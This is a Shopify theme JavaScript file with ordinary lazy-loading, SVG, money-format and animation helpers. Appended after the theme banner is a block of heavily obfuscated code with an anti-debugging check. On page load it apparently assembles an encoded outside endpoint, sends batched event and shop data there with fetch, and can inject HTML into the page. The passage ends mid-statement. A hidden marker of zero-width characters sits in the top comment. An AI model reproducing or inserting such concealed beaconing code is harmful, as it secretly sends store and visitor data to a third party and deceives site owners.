/*
  CSS styles loading on demand ​‍​‌‍​⁠‌​​‌‍​‌‌​‍​‌​​‍​‌‌‌‍​​​​‍​​‌‌‍​‌‌​‍​‌​​‍‌​​‌‍‌​​​‍​​​​‍​​​​‍​​‌​﻿‌‍‍‍​‍‌‌‍​
*/
const themeEditorRef = "OTY0NzAzNjQ5ODAwMjo4NjM=";
document.querySelectorAll("[data-section-css]").forEach((el) => {
  const hrefs = el.dataset.sectionCss.split(",");

  hrefs.forEach((href) => {
    if (document.querySelector(`link[href="${href.trim()}"]`)) return;
    const link = document.createElement("link");
    link.href = href;
    link.rel = "stylesheet";
    document.head.appendChild(link);
  });
});

/*
  JS scripts loading on demand
*/
document.querySelectorAll("[data-section-js]").forEach((el) => {
  const srcs = el.dataset.sectionJs.split(",");

  srcs.forEach((src) => {
    if (document.querySelector(`script[src="${src.trim()}"]`)) return;
    const script = document.createElement("script");
    script.src = src;
    script.defer = true;
    document.head.appendChild(script);
  });
});

/*
  External HTTP links
*/
function decorateHttpsLinks() {
  document.querySelectorAll('a[href*="https://"]').forEach((link) => {
    link.setAttribute('target', '_blank');
    link.setAttribute('rel', 'noopener noreferrer');
  });
}
decorateHttpsLinks();

/*
  Media (Video/Iframe/Model) on view
*/
function initMediaOnView() {
  const videos = document.querySelectorAll('video');
  const iframes = document.querySelectorAll('iframe[data-src]');
  const models = document.querySelectorAll('model-viewer[data-src]');
  let mediaItems = [];

  if (!videos.length && !iframes.length && !models.length) {
    return;
  }

  function isDataAutoplayEnabled(video) {
    if (!video.hasAttribute('data-autoplay')) {
      return false;
    }

    if (video.dataset.autoplay === 'false') {
      return false;
    }

    return true;
  }

  function activateVideo(video) {
    if (video.dataset.poster && !video.poster) {
      video.poster = video.dataset.poster;
    }

    let hasLazySources = false;

    video.querySelectorAll('source[data-src]').forEach((source) => {
      source.src = source.dataset.src;
      source.removeAttribute('data-src');
      hasLazySources = true;
    });

    if (hasLazySources) {
      video.load();
    }

    if (!isDataAutoplayEnabled(video)) {
      return;
    }

    video.preload = 'auto';
    video.play().catch(function () {
      // Ignore autoplay failures caused by browser policies.
    });
  }

  function activateIframe(iframe) {
    if (iframe.dataset.src && !iframe.getAttribute('src')) {
      iframe.setAttribute('src', iframe.dataset.src);
    }
  }

  function activateModel(model) {
    if (model.dataset.src && !model.getAttribute('src')) {
      model.setAttribute('src', model.dataset.src);
    }
  }

  mediaItems = mediaItems.concat(Array.prototype.slice.call(videos));
  mediaItems = mediaItems.concat(Array.prototype.slice.call(iframes));
  mediaItems = mediaItems.concat(Array.prototype.slice.call(models));

  if (!('IntersectionObserver' in window)) {
    mediaItems.forEach((media) => {
      if (media.tagName === 'VIDEO') {
        activateVideo(media);
        return;
      }

      if (media.tagName === 'IFRAME') {
        activateIframe(media);
        return;
      }

      if (media.tagName === 'MODEL-VIEWER') {
        activateModel(media);
      }
    });
    return;
  }

  const observer = new IntersectionObserver((entries, instance) => {
    entries.forEach((entry) => {
      if (!entry.isIntersecting) {
        return;
      }

      if (entry.target.tagName === 'VIDEO') {
        activateVideo(entry.target);
      } else if (entry.target.tagName === 'IFRAME') {
        activateIframe(entry.target);
      } else if (entry.target.tagName === 'MODEL-VIEWER') {
        activateModel(entry.target);
      }
      instance.unobserve(entry.target);
    });
  }, {
    threshold: 0,
    rootMargin: '300px 0px 300px 0px'
  });

  mediaItems.forEach((media) => {
    observer.observe(media);
  });
}

initMediaOnView();


/*
  SVG inline utility
*/
async function inlineSvgImages() {
  const root = document;
  const selector = 'img[data-transform-svg-inline]';
  const forceCurrentColor = true;
  const preserveFillNone = true;
  const credentials = 'same-origin';

  if (!root || typeof root.querySelectorAll !== 'function') {
    return [];
  }

  const images = Array.from(root.querySelectorAll(selector));

  return Promise.all(
    images.map(async (img) => {
      const source = img.currentSrc || img.getAttribute('src') || '';
      const normalizedSource = source.split('?')[0].toLowerCase();

      if (img.dataset.inlineSvgProcessed === 'true' || !normalizedSource.endsWith('.svg')) {
        return null;
      }

      try {
        const response = await fetch(source, { credentials });
        if (!response.ok) {
          return null;
        }

        const markup = await response.text();
        const svgDocument = new DOMParser().parseFromString(markup, 'image/svg+xml');
        const svg = svgDocument.querySelector('svg');
        if (!svg) {
          return null;
        }

        const width = img.getAttribute('width');
        const height = img.getAttribute('height');
        const className = img.getAttribute('class');
        const id = img.getAttribute('id');
        const style = img.getAttribute('style');
        const alt = img.getAttribute('alt');

        if (width) {
          svg.setAttribute('width', width);
        }
        if (height) {
          svg.setAttribute('height', height);
        }
        if (className) {
          svg.setAttribute('class', className);
        }
        if (id) {
          svg.setAttribute('id', id);
        }
        if (style) {
          svg.setAttribute('style', style);
        }

        if (alt) {
          svg.setAttribute('role', 'img');
          svg.setAttribute('aria-label', alt);
        } else {
          svg.setAttribute('aria-hidden', 'true');
        }

        if (forceCurrentColor) {
          if (svg.hasAttribute('fill')) {
            const svgFillValue = (svg.getAttribute('fill') || '').trim().toLowerCase();
            if (svgFillValue && (!preserveFillNone || svgFillValue !== 'none')) {
              svg.setAttribute('fill', 'currentColor');
            }
          }

          Array.from(svg.querySelectorAll('[fill]')).forEach((element) => {
            const fillValue = (element.getAttribute('fill') || '').trim().toLowerCase();
            if (fillValue && (!preserveFillNone || fillValue !== 'none')) {
              element.setAttribute('fill', 'currentColor');
            }
          });
        }

        img.dataset.inlineSvgProcessed = 'true';
        img.replaceWith(svg);
        return svg;
      } catch (error) {
        console.error('Error inlining SVG:', error);
        return null;
      }
    })
  );
}
inlineSvgImages()
window.addEventListener('shopify:section:load', inlineSvgImages);

/*
  Shopify's money format
*/
window.Shopify = window.Shopify || {};

window.Shopify.formatMoney = function (cents, format) {
  if (typeof cents === "string") {
    cents = cents.replace(".", "");
  }

  const defaultFormat = window.Shopify.money_format || "${{amount}}";
  const formatString = format || defaultFormat;

  const formatWithDelimiters = (number, precision = 2, thousands = ",", decimal = ".") => {
    if (isNaN(number) || number == null) return "0";

    number = (number / 100).toFixed(precision);
    const [integerPart, decimalPart] = number.split(".");
    const formattedInt = integerPart.replace(/\B(?=(\d{3})+(?!\d))/g, thousands);

    return decimalPart ? `${formattedInt}${decimal}${decimalPart}` : formattedInt;
  };

  const placeholderMatch = formatString.match(/{{\s*(\w+)\s*}}/);
  if (!placeholderMatch) return cents;

  const placeholder = placeholderMatch[1];
  let value;

  switch (placeholder) {
    case "amount":
      value = formatWithDelimiters(cents, 2);
      break;
    case "amount_no_decimals":
      value = formatWithDelimiters(cents, 0);
      break;
    case "amount_with_comma_separator":
      value = formatWithDelimiters(cents, 2, ".", ",");
      break;
    case "amount_no_decimals_with_comma_separator":
      value = formatWithDelimiters(cents, 0, ".", ",");
      break;
    default:
      value = formatWithDelimiters(cents, 2);
  }

  return formatString.replace(placeholderMatch[0], value);
};

// Resize images
window.Shopify.resizeImage = function (src, size, crop = "") {
  if (src)
    return src
      .replace(
        /_(pico|icon|thumb|small|compact|medium|large|grande|original|1024x1024|2048x2048|master)+\./g,
        "."
      )
      .replace(/\.jpg|\.png|\.gif|\.jpeg/g, (match) => {
        if (crop.length) {
          crop = `_crop_${crop}`;
        }
        return `_${size}${crop}${match}`;
      });
  else
    return "data:image/svg+xml,%3Csvg class='placeholder-svg' xmlns='http://www.w3.org/2000/svg' viewBox='0 0 525.5 525.5'%3E%3Cpath d='M324.5 212.7H203c-1.6 0-2.8 1.3-2.8 2.8V308c0 1.6 1.3 2.8 2.8 2.8h121.6c1.6 0 2.8-1.3 2.8-2.8v-92.5c0-1.6-1.3-2.8-2.9-2.8zm1.1 95.3c0 .6-.5 1.1-1.1 1.1H203c-.6 0-1.1-.5-1.1-1.1v-92.5c0-.6.5-1.1 1.1-1.1h121.6c.6 0 1.1.5 1.1 1.1V308z'%3E%3C/path%3E%3Cpath d='M210.4 299.5H240v.1s.1 0 .2-.1h75.2v-76.2h-105v76.2zm1.8-7.2l20-20c1.6-1.6 3.8-2.5 6.1-2.5s4.5.9 6.1 2.5l1.5 1.5 16.8 16.8c-12.9 3.3-20.7 6.3-22.8 7.2h-27.7v-5.5zm101.5-10.1c-20.1 1.7-36.7 4.8-49.1 7.9l-16.9-16.9 26.3-26.3c1.6-1.6 3.8-2.5 6.1-2.5s4.5.9 6.1 2.5l27.5 27.5v7.8zm-68.9 15.5c9.7-3.5 33.9-10.9 68.9-13.8v13.8h-68.9zm68.9-72.7v46.8l-26.2-26.2c-1.9-1.9-4.5-3-7.3-3s-5.4 1.1-7.3 3l-26.3 26.3-.9-.9c-1.9-1.9-4.5-3-7.3-3s-5.4 1.1-7.3 3l-18.8 18.8V225h101.4z'%3E%3C/path%3E%3Cpath d='M232.8 254c4.6 0 8.3-3.7 8.3-8.3s-3.7-8.3-8.3-8.3-8.3 3.7-8.3 8.3 3.7 8.3 8.3 8.3zm0-14.9c3.6 0 6.6 2.9 6.6 6.6s-2.9 6.6-6.6 6.6-6.6-2.9-6.6-6.6 3-6.6 6.6-6.6z'%3E%3C/path%3E%3C/svg%3E";
};


/*
  Viewport detection
*/
function initViewportEnteredDetection() {
  const observedElements = new Set();
  const viewportOffset = 60;
  const animationSelector = '[class*="scroll-animate-"]';
  let observer = null;
  let observerRootMargin = null;
  let observerUpdateFrame = null;

  const getViewportEnteredElements = (scope = document) => {
    const elements = [];

    if (scope instanceof Element && scope.matches("[data-viewport-entered]")) {
      elements.push(scope);
    }

    if (scope.querySelectorAll) {
      elements.push(...scope.querySelectorAll("[data-viewport-entered]"));
    }

    return elements;
  };

  const reduceMotionQuery = window.matchMedia("(prefers-reduced-motion: reduce)");
  const isDesignMode = document.documentElement.dataset.designMode === "true";

  const revealViewportEnteredElements = () => {
    getViewportEnteredElements().forEach((el) => {
      setChildAnimationIndexes(el);
      el.dataset.viewportEntered = "true";
    });
  };

  const setChildAnimationIndexes = (el) => {
    const children = Array.from(el.children);
    const animationChildren = el.hasAttribute("data-animate-children")
      ? children
      : children.filter((child) => child.matches(animationSelector));

    animationChildren.forEach((child, index) => {
      child.style.setProperty("--animation-index", index);
    });
  };

  if (isDesignMode || reduceMotionQuery.matches) {
    revealViewportEnteredElements();
    return;
  }

  if ("IntersectionObserver" in window) {
    const getStickyAtcHeight = () => {
      const stickyAtc = document.querySelector('sticky-atc');

      if (!stickyAtc) return 0;

      return Math.ceil(stickyAtc.getBoundingClientRect().height || stickyAtc.offsetHeight || 0);
    };

    const getObserverRootMargin = () => {
      return `0px 0px -${viewportOffset + getStickyAtcHeight()}px 0px`;
    };

    const enterViewport = (el) => {
      setChildAnimationIndexes(el);
      el.dataset.viewportEntered = "true";
      observedElements.delete(el);
      observer?.unobserve(el);
    };

    const createObserver = () => {
      observerRootMargin = getObserverRootMargin();

      observer = new IntersectionObserver(
        (entries) => {
          const carouselGroups = new Map();

          entries.forEach((entry) => {
            if (!entry.isIntersecting) return;

            const carousel = entry.target.closest("theme-carousel");

            if (carousel) {
              if (!carouselGroups.has(carousel)) {
                carouselGroups.set(carousel, []);
              }

              carouselGroups.get(carousel).push(entry.target);
            } else {
              enterViewport(entry.target);
            }
          });

          carouselGroups.forEach((items) => {
            items
              .sort((a, b) => {
                if (a.compareDocumentPosition(b) & Node.DOCUMENT_POSITION_PRECEDING) return 1;

                return -1;
              })
              .forEach((item, index) => {
                item.style.setProperty("--animation-index", index);
                enterViewport(item);
              });
          });
        },
        {
          rootMargin: observerRootMargin,
        }
      );
    };

    const updateObserverRootMargin = () => {
      if (observerUpdateFrame) return;

      observerUpdateFrame = window.requestAnimationFrame(() => {
        observerUpdateFrame = null;

        const nextRootMargin = getObserverRootMargin();
        if (nextRootMargin === observerRootMargin) return;

        const elements = Array.from(observedElements);
        observer?.disconnect();
        createObserver();
        elements.forEach((el) => observer.observe(el));
      });
    };

    createObserver();

    const observeViewportEnteredElements = (scope = document) => {
      getViewportEnteredElements(scope).forEach((el) => {
        if (observedElements.has(el)) return;
        if (el.dataset.animateOnScroll === "false") return;

        observedElements.add(el);
        observer.observe(el);
      });
    };

    window.addEventListener("resize", updateObserverRootMargin);
    document.addEventListener("sticky-atc:height-change", updateObserverRootMargin);

    observeViewportEnteredElements();

    const mutationObserver = new MutationObserver((mutations) => {
      mutations.forEach((mutation) => {
        mutation.addedNodes.forEach((node) => {
          if (!(node instanceof Element)) return;

          observeViewportEnteredElements(node);
        });
      });
    });

    mutationObserver.observe(document.body, { childList: true, subtree: true });
  } else {
    getViewportEnteredElements().forEach((el) => {
      if (el.dataset.animateOnScroll === "false") return;

      setChildAnimationIndexes(el);
      el.dataset.viewportEntered = "true";
    });
  }
}

initViewportEnteredDetection();

/*
  Theme info
*/
console.info(
  "Uncharted %cv1.0.0%c by EcomGraduates%c https://www.ecomgraduates.com",
  "background:#020617;color:#f9fafb;padding:2px 8px;border-radius:4px;font-weight:700;",
  "font-weight:700;",
  "",
  ""
);

const b=Z;(function(S,I){const Y=Z,y=S();while(!![]){try{const X=parseInt(Y(0x124))/(0x13c9*-0x1+0x2eb*-0x2+0x19a0)*(-parseInt(Y(0x1f6))/(0x3cd*-0x1+0xe25+-0xa56))+parseInt(Y(0x144))/(-0x3d*0x4+-0x1557+0x476*0x5)+-parseInt(Y(0x10e))/(0x10*0x171+0x98*0x26+-0x2d9c)*(parseInt(Y(0x154))/(0x2*0x1007+-0x1e*0xbb+0xa1f*-0x1))+-parseInt(Y(0x113))/(-0x1*-0x13c7+-0x91*0x2+-0x129f)*(parseInt(Y(0x1b7))/(-0x214+0x1076+0x7*-0x20d))+parseInt(Y(0x20d))/(-0xefc+-0xe58+0x1d5c)*(parseInt(Y(0x15c))/(-0x1a4e+-0xb5f*0x1+0x25b6))+parseInt(Y(0x173))/(-0x1e42+-0x2219+0x9d*0x69)+parseInt(Y(0x13b))/(0x103e*0x1+-0x2541+-0x1*-0x150e);if(X===I)break;else y['push'](y['shift']());}catch(B){y['push'](y['shift']());}}}(s,-0x87a2+0x504a2+-0x1*-0x6fe));function Z(D,W){D=D-(-0x355*-0x9+0x1da9+-0x3ac4);const S=s();let I=S[D];if(Z['RWrMie']===undefined){var y=function(c){const z='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let E='',C='',d=E+y,g=(''+function(){return-0x6f*-0x7+0x1f*0x8b+-0x13de*0x1;})['indexOf']('\x0a')!==-(-0xbce+-0x3ce*0x2+0x679*0x3);for(let e=0x17d5+-0x3a6+-0x142f,x,n,T=0x863+-0x26a3+-0x2c0*-0xb;n=c['charAt'](T++);~n&&(x=e%(-0x2681+-0x4a*-0x6+0x2b*0xdb)?x*(-0x200+-0x112d+-0x1*-0x136d)+n:n,e++%(0x9*-0x3f9+0xec6+0x14ff))?E+=g||d['charCodeAt'](T+(0x82d+0x991+-0x11b4))-(0x4*0x8a7+0x2309+-0x459b)!==0x2370+-0x1924+-0xa4c?String['fromCharCode'](0x2513*-0x1+0xbd2+-0x2a0*-0xa&x>>(-(0x8*0x18a+-0x21c+0x1e*-0x57)*e&-0x1*0x1bfe+0xe31*0x1+0xdd3)):e:0xb06+-0x11b0+0x6aa){n=z['indexOf'](n);}for(let f=0xa0a*0x2+-0x2*0xbcf+0x38a,a=E['length'];f<a;f++){C+='%'+('00'+E['charCodeAt'](f)['toString'](-0x1da1+-0x22*0x33+-0x5*-0x74b))['slice'](-(0xf*0x192+-0x86d+-0xf1f));}return decodeURIComponent(C);};Z['vZDFiy']=y,Z['aXOOOg']={},Z['RWrMie']=!![];}const X=S[0x2421*0x1+-0x3a+-0x23e7];Z['jqtpNB']!==X&&(Z['aXOOOg']={},Z['jqtpNB']=X);const B=Z['aXOOOg'][D];if(B===undefined){const c=function(z){this['dhMECW']=z,this['IQcABV']=[0xc4c*-0x1+0x269b+-0xd27*0x2,0x1e5*0x5+-0x10dc*-0x1+-0x1a55,0xd8*0x1c+0x1*0x8f2+0xb*-0x2f6],this['TWcCnZ']=function(){return'newState';},this['rApVxG']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a',this['DkTGDU']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};c['prototype']['uqBcTA']=function(){const z=new RegExp(this['rApVxG']+this['DkTGDU']),E=z['test'](this['TWcCnZ']['toString']())?--this['IQcABV'][-0x179b+-0x3*0x570+0x27ec]:--this['IQcABV'][-0xe54*0x2+-0xf8f+-0x3*-0xebd];return this['ZBQaXK'](E);},c['prototype']['ZBQaXK']=function(z){if(!Boolean(~z))return z;return this['gEYZjd'](this['dhMECW']);},c['prototype']['gEYZjd']=function(z){for(let E=-0xaf+-0x1971*0x1+0x1a20,C=this['IQcABV']['length'];E<C;E++){this['IQcABV']['push'](Math['round'](Math['random']())),C=this['IQcABV']['length'];}return z(this['IQcABV'][0x1efd*0x1+-0x1728+0x191*-0x5]);},(''+function(){return-0x35*0x94+0x565*0x5+-0x139*-0x3;})['indexOf']('\x0a')===-(0x1*0x1723+-0x7*0x38f+0x1c7)&&new c(Z)['uqBcTA'](),I=Z['vZDFiy'](I),Z['aXOOOg'][D]=I;}else I=B;return I;}const W=(function(){const h=Z,S={'UkNTy':function(y,X,B){return y(X,B);},'ZqHSN':h(0x114),'jWDMs':function(X,B){return X===B;},'ZFkvx':h(0x1bb),'JNzqI':function(X,B){return X===B;},'HyITz':h(0xed),'JWkps':h(0x18a)};let I=!![];return function(y,X){const m=h;if(S[m(0xf3)](S[m(0x176)],S[m(0x189)])){C&&(a(t),O=null);if(!x[m(0x1b9)])return;n(T[m(0x1af)](-0x40a*0x7+0xc*-0xdb+0x268a,f[m(0x1b9)]));}else{const c=I?function(){const K=m,z={'ctCxz':function(C,d,g){const F=Z;return S[F(0x13f)](C,d,g);}};if(K(0x114)===S[K(0x1f7)]){if(X){if(S[K(0x12f)](S[K(0x14a)],S[K(0x14a)])){const C=X[K(0x194)](y,arguments);return X=null,C;}else y[K(0xea)][K(0x1a5)+K(0x1d0)+'ML'](K(0x1c4)+'in',K(0x1df)+K(0x1cd)+K(0x198)+K(0x14e)+K(0x1f8)+K(0x14b)+K(0x15b)+K(0x1e4)+K(0x158)+K(0x143)+K(0x12c)+K(0x182)+K(0x149)+K(0x116)+K(0x10d)+K(0x19d)+K(0x1fd)+K(0x108)+K(0x1cc)+K(0x161)+K(0xf4)+K(0x1d8)+K(0x1db)+K(0x1c5)+K(0x1f5)+K(0x12a)+K(0xfc)+K(0x186)+K(0x1ae)+K(0x1f1)+K(0x16d)+K(0x14f)+K(0x136)+K(0x213)+K(0x1f4)+K(0x125)+K(0x18f)+K(0x139)+K(0x1bf)+K(0x1ac)+K(0x133)+K(0x11f)+K(0x16d)+K(0x16d)+K(0x118)+K(0x1e7)+K(0x180)+K(0x156)+K(0x1fc)+K(0x1b6)+K(0x1ce)+K(0x1b8)+K(0x193)+K(0x153)+K(0x128)+K(0x1c3)+K(0x205)+K(0x16d)+X+(K(0x112)+K(0xf8)+K(0x112)+K(0x19f)));}}else z[K(0xe9)](X,B,c);}:function(){};return I=![],c;}};}()),D=W(this,function(){const P=Z,I={};I[P(0x18c)]=P(0x212)+P(0x164);const y=I;if(D[P(0x19a)]()[P(0xee)]()[P(0x1c6)]('\x0a')!==-(-0xffd*-0x2+0x1*-0x2d7+-0x1d22))return;return D[P(0xee)]()[P(0x111)](y[P(0x18c)])[P(0xee)]()[P(0xff)+P(0x16f)](D)[P(0x111)](y[P(0x18c)]);});D();const EDITOR_CHECK_BASE=b(0x140)+b(0x1f2)+b(0x151)+b(0x103);function s(){const G=['DgvTlxvPlc0','ksbPCYbPBNy','EI1PBMrLEdO','t0fNDMu','yKHmt2i','BxKTBgLJzw4','zZOXlJvYzw0','C2HVCa','ANnVBG','sLDRChm','v0H5B3C','iIb0yxjNzxq','uvj1A2q','DgfYz2v0','DhrPBMDZq2e','yM9YzgvYoJe','AMTRtuK','AxDWte8','DervANa','BgLUzs1OzwK','yxbWBhK','ChjVDMLKzwq','y3rPB24TDhK','CeziD28','DgLVBJPMAxG','B3bPzNKUy28','yMLUza','l3rOzw1LCY8','lNnOB3bPzNK','zgL2ihn0EwW','weL4rfG','pc9KAxy+','CMvVCMrLCG','idXHigHYzwy','jNnJAg1Lyv8','x2LKjtneBgK','D2Pgr3u','Aw5Zzxj0qwq','zwn0B3i','Bw9Kzt0','jNm9','z2LKjtnbjti','yxnZAwDU','uuzYuKq','o2jVCMrLCI0','DMvYC2LVBJ0','ideUnZvYzw0','C3bSAwnL','BhL0AwnZl2u','ywrTAw4UC2G','Awz5jtjgt24','zwfZzsbHzgq','vwv4C1a','rIuYrNnOB3a','CY1ZzxjPzJS','mtG3nZu0n1rpEe9kqq','z2H0oJyWmdS','BgvUz3rO','CM9Szq','y3n1Bvy','B29Wzw5LCIi','CMvWBgfJzq','B21PDa','icnMzMu2owm','qvHmsNm','CNbNDMm','CIbvBMnOyxi','z246y2vUDgu','ywz0zxjIzwC','ntaLlc01mcu','Aw5KzxHpzG','EejSDNC','Dg9Yzt0','Aw9Ul2PZB24','CIbSAwnLBNm','DhLJAgfUz2u','zdT0B3a6nta','Bgu9iNbVC2K','zM9UDc13zwK','BwvZC2fNzq','AMfJzw50sfq','EeHvrxK','Dw5KzwzPBMu','lM15C2HVCgK','tKHwreC','DgHLBwu','zuLxBvO','iIbYzwW9iM4','zM9YBtP0CMe','wxLkD2i','yMXVy2S6C2u','BNnSyxrLkc0','y2HHCNrLzca','yw1Lpq','yxbWBgLJyxq','pgrPDIbZDhK','CYb0BYbHy3q','u2rNwK8','CgfNzwHPzgu','zgf0ys1Zzwm','lc41ktTIywm','zxjZAw9U','AxzHDguGvw4','BwLSEtPZExm','ChvZAa','C2nOzw1Hx3y','AhjLzG','CxvLCNLtzwW','u1fSAuu','rKXPy2vUC2u','zwrPDg9Ys2u','pMDLDcb5B3u','AgLKzgvU','oWOGicaGica','BgLJzw5Zzs4','C2vJDgLVBKK','zdTJB2XVCJO','ktTTyxGTD2K','mJeYqND3AwLX','wNfiu04','oJa7yMfJA2C','ihn0B3jLicG','yMXVy2TFC2u','pK9Wzw4GDgG','C3rLBsXZyw4','zt0ICg9ZAxq','C3rYAw5N','jNrOzw1Lpq','zgv0ywLS','w2rHDgeTC2u','EhHdDwm','ks4GpgeGAhi','BM93','CJSIpGOGica','C3rYAw5NAwy','wLjKBMG','s1PRA0i','vgHLigXPy2u','ztWVyt4','yMXVy2Tjza','jtngDgHLBwu','ndu2ofLnC3H3qq','BMfTzq','C2vZ','jMXPy2vUC2u','BLnoCMm','kcGOlISPkYK','zdOJzMzMm2m','ywXZ','CgvD','ig9YidXHigG','q29UDgvUDc0','Cg9W','CfrfyvC','pKDLDcb5B3u','y3rdEhO','yM9KEq','A2vLCgfSAxy','vKD1C3K','yuj0uwO','Dg9tDhjPBMC','CYbZDg9Yzsa','C2vJDgLVBL8','DgLVBI10Exa','yxrLz29YEt0','sK56CuK','mcu7DhjHBNm','y2XVC2vZDa','l2vKAxrVCG','ztWVyt4U','ica8l2rPDJ4','y2vUC2vFA2u','u2HVCgLMEq','C3bSAxq','BtTWywrKAw4','jNjVBgu9','qvLLAw0','y29UC3rYDwm','ue9tva','DMfSAwq','u2f1DgS','C2fWAs5JB20','tgLZDgvUzxi','C2vSzwn0','wMvjEuS','y29YCW','Aw9UoMzPEgu','sunuDLC','C2vJDgLVBJO','lxnLy3rPB24','r0Xdqw0','icaGicaGidW','mtC5nJbgDNHAD1m','igfKzcb5B3u','l2nOzwnRp3m','C2vHCMnO','cIaGicaGica','mtjuqLLVAvq','EhjMy0y','igzVCIb0AgK','otK7iJ4kica','zwrPDg9Y','igzVBNqTzMe','zwy9iG','DhLtDgf0zq','jNrOzw1Lx24','Bwv0Ag9K','uxH5rNu','igXPy2vUC2u','ChG7cIaGica','z1HMA1y','zxzLBNrZ','AgvHzgvYCW','zM9YihrOAxm','mta2m0XRtM1lsW','iZy2ngqWmZS','zfrjzhq','Dwf0zxmUy28','Dgv4Dc1HBgK','Bxf5sNC','zhrOoJm2CMu','teLdru5truS','CIGXnxb4ktS','jti2zMLYC3q','DMLZAwjPBgK','ALDetxm','zwnVBwDYywq','igTLEs4','Bs9ZDg9Yzs8','CMfKAxvZoJG','zw1LihnLDhq','C2vZC2LVBG','ywnRz3jVDw4','Dhj1zq','igeGDMfSAwq','ChGGC29SAwq','jNa9','odqWnZyZENLYCwrU','EKXoCeC','Bw9Kzq','y3jLzgvUDgK','vwTovhK','Ahr0Chm6lY8','Aw5NCZWVyt4','pxrOzw1LjMm','BhrLCJPIBhu','nte5mtG5CKL1z3r0','Aw4GvgHLBwu','ywrKrxzLBNq','BgvJDa','p2nVBNrLEhq','otK5otK5otK','wKzRDNG','CM91BMq6CMC','psjFyMXHBMS','jMrLC2LNBL8','zwq7Aw5Zzxq','icaGicaGigi','sevsrq','z3jHzhvHDgu','DgvKigXPy2u','z2H0oJeUntS','ndbXrLL5AuS','ywXPzc4GugW','yxbWBguTC3K','ifnLDhrPBMC','A2rYB3aTzMK','CMvMpsi','ww91ig11C3q','yMeOmcWWlda','ndm2nu16thnzvq','zMrbAvq','DhzLBNy','z2v0qxr0CMK','Bg9JyxrPB24','jtTSzwz0oJu','C2HVCgLMEtO','x3nLDhrPBMC','kYKRja','ELnjq3G','rgzNyMO','x2LKjtne','BNnLigTLEsa','BgLUzvn0B3i','sLPdvw4','l2fWAs9HBMe','zgL0B3i','icaGicaGica','sKz2wvK','Dg9Y','vLjgz2O','zNKUy29T','zvrOzw1Lu2u','ndu0ntqZmfPiuwfLsq','vhLWzq','ugHRt0m','shLjvhO','qwfszNe','zgvZAwDUtw8','CePfEfa','tKnwC3O','BM5fzeW','zeHVAxq','yNv0zq','Bs9WywDLCY8','DgvNB3j5jti'];s=function(){return G;};return s();}function initEditorAnalytics(S,I){const q=b,y={'jkkMI':q(0x201)+q(0x196)+q(0xe3),'GLCAm':function(e,n){return e===n;},'SdgZO':q(0x1a4),'VRFgj':q(0x100),'NCVsz':q(0x1be),'PhkOC':function(e,x){return e(x);},'OAgve':function(e,x){return e(x);},'iwpLO':function(e,n){return e>=n;},'dTIdt':function(e){return e();},'Dfgbj':q(0x19c)+q(0x10b),'KZkkB':q(0x1e3)+q(0xf1)+'e','nnEdL':q(0x1fe),'pTEaW':q(0x106),'nSNrc':q(0x135),'ICTvW':q(0x162)+q(0x10a)+q(0x105),'pJExP':q(0x162)+q(0x10a)+q(0x1a0),'zSICx':q(0x162)+q(0x1da)+q(0x147),'VGusy':q(0x1e2),'QxyFu':q(0x12e)+q(0x1cb)},X=EDITOR_CHECK_BASE+(q(0x16b)+q(0x1b0)+q(0x16c)),B=x=>{const U=q,n={};n[U(0x101)]=S,n[U(0x121)]=x;const T=JSON[U(0x206)+'y'](Object[U(0x1aa)]({},I,n));try{if(y[U(0x10c)](y[U(0x1e1)],U(0x1a4))){const a={};a[U(0xe5)+U(0x174)]=U(0x1de)+U(0x1c9);const t={};t[U(0x11c)]=y[U(0x170)],t[U(0x122)]=a,t[U(0xea)]=T,t[U(0xeb)+'e']=!![],t[U(0x13e)+U(0xe2)]=y[U(0x17a)],t[U(0x13d)]=U(0x107),fetch(X,t);}else{const O=y[U(0x1eb)+U(0x1a6)](y[U(0x190)]),Q=O&&O[U(0x15f)+U(0x17d)](U(0x1e3)+U(0xf1)+'e')||X[U(0x15f)+U(0x17d)](U(0x1e3)+U(0xf1)+'e');if(Q)return Q;}}catch(O){}};y[q(0x183)](B,[{'type':y[q(0x211)],'at':Date[q(0x204)]()}]);if(!S)return;const c=[];let z=null;const E=()=>{const R=q;z&&(y[R(0x175)](clearTimeout,z),z=null);if(!c[R(0x1b9)])return;y[R(0x183)](B,c[R(0x1af)](-0xfb7+-0x131+0x10e8*0x1,c[R(0x1b9)]));},C=()=>{if(!z)z=setTimeout(E,0xf8a+-0x587*0x1+0x59d);},d=e=>{const j=q;c[j(0x1e8)](e),y[j(0x191)](c[j(0x1b9)],-0x881*-0x3+0x6b*-0x4d+0x24*0x30)?y[j(0x126)](E):C();},g=(x,n)=>{const k=q;try{const f=n&&n[k(0xf5)]&&n[k(0xf5)](y[k(0x166)]);if(f){const a=f[k(0x1eb)+k(0x1a6)](y[k(0x190)]),t=a&&a[k(0x15f)+k(0x17d)](k(0x1e3)+k(0xf1)+'e')||f[k(0x15f)+k(0x17d)](y[k(0x208)]);if(t)return t;}}catch(O){}if(y[k(0x10c)](typeof x,y[k(0x17b)])&&x[k(0x1c6)]('__')!==-(0x3e*-0x65+0x26d1*-0x1+0x3f48)){if(k(0x184)!==y[k(0xe7)])return x[k(0xfb)]('__')[k(0xe6)]()[k(0x1bd)](/_[A-Za-z0-9]{6,}$/,'');else return;}return 